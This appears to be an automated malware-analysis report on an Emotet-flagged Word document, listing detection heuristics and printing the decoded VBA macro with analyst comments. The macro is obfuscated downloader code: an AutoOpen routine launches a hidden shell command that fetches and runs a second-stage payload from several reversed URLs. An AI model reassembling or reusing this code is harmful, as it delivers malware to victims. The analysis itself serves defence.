MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
A critical OLE_VBA_SHELL heuristic fires on this sample, indicating a Shell() call within the VBA macros. An AutoOpen macro is present and attempts to execute obfuscated code. ClamAV detection confirms this is Doc.Downloader.Emotet-6884101-0, a known downloader. The VBA script likely downloads and executes a second-stage payload, a common Emotet tactic.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884101-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6884101-0
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
AutoOpen macro — high — OLE_VBA_AUTOOPEN: AutoOpen macro
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4589 bytes |
| SHA-256: 9198a6664b6c2de206e24e63a47621af31a7a73056f4e098646fe35d4009277b | | | |
Preview script — first 1,000 lines of the extracted script
' Module header as exported by olevba. Attribute lines are metadata on the
' module, not executable statements. VB_Base = "1Normal.ThisDocument" indicates
' this is the document's own ThisDocument class module, which is why the
' AutoOpen procedure below runs without being referenced from anywhere else.
Attribute VB_Name = "MbzVSCiir"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen: Word runs this procedure automatically when the document is opened
' (the OLE_VBA_AUTOOPEN finding above). The only operative statement in it is
' the VBA.Shell call; every Hour statement is filler. This is the execution
' entry point a detection rule or sandbox trace should key on.
Sub AutoOpen()
' "On Error Resume Next" split over four lines with line-continuation
' characters so a plain-text search for the phrase does not match it. Any
' runtime error from here on is discarded and execution continues.
On _
Error _
Resume _
Next
' Hour() expects a date/time value; the junk string argument presumably raises
' a type-mismatch error that Resume Next swallows. The call has no useful
' effect and only pads the code — same for every Hour line below.
Hour "kYkwAkFuU" + "BUmp"
' The command line is assembled at run time from a call to KeyString(67)
' (9 + 10 + 7 + 3 + 38; KeyString is not defined in this preview), the
' helper functions QsJVIZZjWt and KCAiXpf defined later in this export, and
' four further names (LsdzqiswKlE, YcmXbnqqzjY, piKFTHEKRYKAut, pzARrpZ) that
' are not visible here. The second argument, 39 - 39, evaluates to 0 — the
' vbHide window style — so the spawned process runs with no visible window.
VBA.Shell KeyString(9 + 10 + 7 + 3 + 38) + LsdzqiswKlE + YcmXbnqqzjY + QsJVIZZjWt + KCAiXpf + piKFTHEKRYKAut + pzARrpZ, 39 - 39
Hour "OO" + "6746"
Hour "lFS" + "YSGDcXhtw" + "IkYdGzEcqFt" + "aEPEzCF"
Hour "IF" + "s"
Hour "523709441" + "86618552"
End Sub
' Start of a second exported module; the helper functions that AutoOpen
' concatenates into its Shell argument live here.
Attribute VB_Name = "jhCtZjWFr"
' QsJVIZZjWt: builds one string from twelve local fragments and returns it.
' AutoOpen concatenates this return value into the command line it passes to
' VBA.Shell. The only lines that matter are the twelve assignments and the
' final concatenation; every Hour statement is filler (see AutoOpen).
Function QsJVIZZjWt()
' Same split "On Error Resume Next" as in AutoOpen: errors from the Hour
' calls, or from anything else in this function, are discarded.
On _
Error _
Resume _
Next
Hour "8515" + "RSAvpLdi"
Hour "BDZD" + "ZWJakL" + "4317" + "JZrq"
' Each fragment is itself assembled from short literals so that no complete
' keyword appears in the source. The pieces are dense with caret (^)
' characters, which cmd.exe treats as escapes and strips, and this first
' fragment ("md " then "/V^:^O/" + "C") reads like part of a cmd.exe
' /V:O /C invocation — an inference from the text, not confirmed here.
' Chr(0 + 2 + 5 + 5 + 22) is Chr(34), a double-quote character.
EUNjTVu = "md " + "/V^:^O/" + "C" + Chr(0 + 2 + 5 + 5 + 22) + "s^" + "et " + "^1P" + "^" + "2m=" + " ^ ^ ^" + " " + " ^ " + "^" + " ^ " + "^ "
Hour "YiiVFJn" + "343" + "jsYOf" + "oLi"
Hour "dQAht" + "r"
QKKmjfjGa = "^}}{h" + "c" + "tac^}^;" + "kaer" + "^" + "b;Wq^z" + "^$"
Hour "9235" + "G" + "PjHMiiIMMYqj" + "4184"
Hour "aAIi" + "9971" + "BF" + "WDPEZRhsE"
Hour "BzwRoO" + "XwkQOC"
OKcmiK = " m^" + "e^t^" + "I^" + "-" + "e" + "^ko"
Hour "192030899" + "W" + "6535" + "LObiUPC"
Hour "w" + "p"
aMhDaSML = "vn" + "I;" + ")" + "Wqz$ ^" + ",Un^Q" + "^$(^" + "e^l^" + "iF^d^ao" + "ln^w" + "o^D.K" + "Mv^$"
Hour "UYKXfJFstldsZ" + "2507"
Hour "260049142" + "LpdUNUT"
Hour "EcqiowjQrdNo" + "JvTEhZiDW"
cZFzO = "^{^yrt" + "{)aV" + "X$^ n^" + "i ^Un" + "Q^$(^" + "hca^er" + "of^;'e" + "^" + "x^e" + ".^"
Hour "5518" + "Mowj" + "436126605" + "hjf"
Hour "J" + "tmnicvK"
NjXruuGDDh = "'" + "^+i" + "n^z" + "$^+'\^'" + "+c^i" + "lbu" + "p:" + "vn" + "^e$=^Wq" + "^z^$^" + ";^'7"
Hour "GXGiF" + "oukn" + "RRnWL" + "807"
Hour "27250545" + "liY" + "vtjD" + "jrNV"
Hour "Pdmrfoi" + "S" + "GwvPdOZazDQLvm" + "zfGcvfRYJMS"
ZIqwciGNT = "^0" + "8^' =^ " + "in^z$^;" + ")" + "^'^@^'(" + "^t^i" + "^l^pS." + "^'^7^" + "En/k" + "s.r" + "^" + "e^ll"
Hour "145539250" + "iK"
Hour "zEjJXXXUpZ" + "3126" + "DLp" + "T"
Hour "481460324" + "w" + "wkEc" + "Uu"
Hour "hFaw" + "OrqKdrvNBIlYU"
' From here on the fragments contain pieces such as "ptth@", "//:ptth" and
' "^.^moc" that read as reversed URL text ("http://", ".com") once carets are
' removed — consistent with the consumer reversing the assembled string before
' it runs, which cannot be confirmed from this function alone. These are the
' lines an analyst would recover the second-stage download locations from.
VhoEiX = "^im-" + "hca^b" + "hcsi" + "^" + "f//:" + "ptth@" + "^m^yv" + "a^3^" + "HQ/^moc" + "^.^yr" + "tn" + "u" + "^oce^h^"
Hour "HALRRjMtcuMkva" + "htN" + "9687" + "WXYz"
Hour "8104" + "477685144"
crCUnITOId = "tn^in" + "w^o^d/" + "/:" + "pt" + "^t" + "h^@p^p" + "x^3^3" + "^zx/moc" + "^.s^a^e" + "^s^-" + "iiv/" + "/^:ptth"
Hour "iNXAwaJdXIJ" + "CwoZ" + "IN" + "9971"
Hour "KiahBD" + "jBnBKudj" + "tN" + "9285080"
CRPzmFt = "@u^0^" + "s^d/^m" + "^oc" + "^.^b^al" + "hsol" + "c//:^p^" + "tt^h^@" + "^" + "y^BsDr5" + "^D^J/^s" + "^ed"
Hour "tYkQLYizv" + "CS" + "Yiw" + "zXiuWU"
adYNRwYJza = "^" + "ulc" + "n^i/ni" + "^md^" + "a^" + "-p" + "w/mo" + "c^.r" + "^e^m^a" + "git^l^"
Hour "V" + "U"
Hour "DDiRJqQpf" + "255308434" + "jGXw" + "4457"
Hour "181301870" + "ZG"
Hour "330024640" + "384027068" + "FCHaQnDBXEc" + "ECaikV"
ndoZmwK = "u." + "w^" + "ww//:" + "^p^tt" + "^h'" + "^=" + "aV^X^" + "$;^" + "tn^e" + "^ilC" + "^"
' Return value: the twelve fragments joined in assignment order. Nothing is
' executed inside this function; it only produces text for AutoOpen's Shell.
QsJVIZZjWt = EUNjTVu + QKKmjfjGa + OKcmiK + aMhDaSML + cZFzO + NjXruuGDDh + ZIqwciGNT + VhoEiX + crCUnITOId + CRPzmFt + adYNRwYJza + ndoZmwK
Hour "I" + "220133100"
Hour "97154170" + "KQwJ"
Hour "QEMkiQ" + "jtFOmlcRF" + "7415" + "CzcNwi"
End Function
Function KCAiXpf()
On _
Error _
Resume _
Next
Hour "vO" + "225418518" + "GHTijmWR" + "250794159"
iDcrPv = "b" + "e" + "^W.^te" + "N ^tc^e" + "^jb" + "o^-we" + "n^=K" + "^Mv^$ " + "ll^e" + "^hsr^e^" + "w"
Hour "PtNOsQWPXF" + "uJSG"
Hour "LN" + "Ulpn"
Hour "LMJPcUzGnUN" + "455925256" + "304860899" + "EZPzMV"
Hour "DBpvnULRMUlUI" + "1620" + "2606" + "kf"
TmlhFzcVz = "op&&^f" + "^or " + "/^" + "L %^Y ^" + "in ("
Hour "aisG" + "hCC"
jVPaYjuJt = "^3" + "81^," + "-^1,^0" + ")d^o" + " " + "s^e^t " + "^" + "7^Y^" + "z=!^7" + "^Y^z!"
Hour "5617" + "6863" + "vDbmloYVwhjr" + "1216"
ZPOKmZ = "!^" + "1" + "P^2m:~" + "%" + "^Y,1!" + "
... (truncated)
|
|||